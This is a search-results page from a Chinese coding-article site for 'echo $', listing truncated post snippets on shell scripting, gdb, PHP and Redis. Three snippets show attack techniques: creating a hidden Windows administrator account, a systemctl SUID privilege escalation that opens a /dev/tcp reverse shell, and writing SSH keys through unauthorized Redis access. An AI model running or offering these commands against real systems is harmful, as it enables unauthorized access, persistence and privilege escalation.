码迷,mamicode.com
首页 >  
搜索关键字:echo $    ( 13483个结果
shell 脚本简单使用
shell 在线编辑器:https://www.runoob.com/try/runcode.php?filename=helloworld&type=bash 一下脚本自行测试查看结果 echo "Hello World !" your_name="qinjx" echo your_name fo ...
分类:系统相关   时间:2021-05-24 17:21:02    阅读次数:0
gdb 打印每个线程的bt ps 状态等命令
for i in `ps -AL |grep Worker | awk '{print $2}'`; do \ echo $i ; \ gdb --q --n --ex bt --batch --pid $i; \ done 2>&1 |tee /var/stacks.txt CPU使用率较低但负载 ...
分类:数据库   时间:2021-05-24 17:19:34    阅读次数:0
创建隐藏用户
net user test$ 123 /addnet localgroup administrators test$ /addHKEY_LOCAL_MAHINE\SAM\SAM 权限 导出对应的两个文件users和names,然后删除test$在运行这两文件@echo offreg query(查询 ...
分类:其他好文   时间:2021-05-24 16:06:04    阅读次数:0
suid-systemctl提权
当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. ...
分类:其他好文   时间:2021-05-24 14:55:34    阅读次数:0
php工厂设计模型
<?php class A{ function index (){ echo '我是A的index'; } } class B{ function index (){ echo '我是B的index'; } } class C{ function index (){ echo '我是C的index' ...
分类:Web程序   时间:2021-05-24 14:24:42    阅读次数:0
static::、self::、new self()、new static()
static::、self::、new self()、new static() <?php class Father{ protected static $name = "大头"; public static function father_self(){ echo self::$name."\n" ...
分类:其他好文   时间:2021-05-24 14:21:29    阅读次数:0
Linux命令8
安装 javaee jdk mysql apache ideaIU shell编程 x.sh脚本 格式要求: 1.脚本以#!/bin/bash开头 2.脚本要有可执行权限 vim hello.sh 写上: #!/bin/bash echo "hello,world" 保存退出 sh hello.sh ...
分类:系统相关   时间:2021-05-24 13:41:21    阅读次数:0
redis 未授权访问(写公钥、写计划任务)
写公钥 ssh-keygen -t rsa # 生成key (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > /tmp/key.txt # 前后加换行 cat /tmp/key.txt | redis-cli -h 59.xx.xx.157 -x ...
分类:其他好文   时间:2021-05-24 13:41:02    阅读次数:0
一个简单验证防火墙是否禁止下载文件的办法
第一步获取待下载文件列表. 解压缩到到执行目录下面 我这边使用Windows10 里面的 WSL的方式直接进行相关工作 ls *.zip > list.url 将需要下载的zip包变成列表文件. 第二步 使用shell脚本进行判断文件是否存在 #!/bin/bash echo " "> /deplo ...
分类:其他好文   时间:2021-05-24 12:11:03    阅读次数:0
宝塔redi状态检测 如果停止则重启 放计划任务
ps=`ps -efl|grep redis|grep -v $0|grep -v grep|wc -l` if [ $ps -eq 0 ]; then rm -f /www/server/redis/redis.pid echo -e "\n$(date '+%Y-%m-%d %H:%M:%S') ...
分类:其他好文   时间:2021-05-24 10:05:33    阅读次数:0
13483条   上一页 1 ... 4 5 6 7 8 ... 1349 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!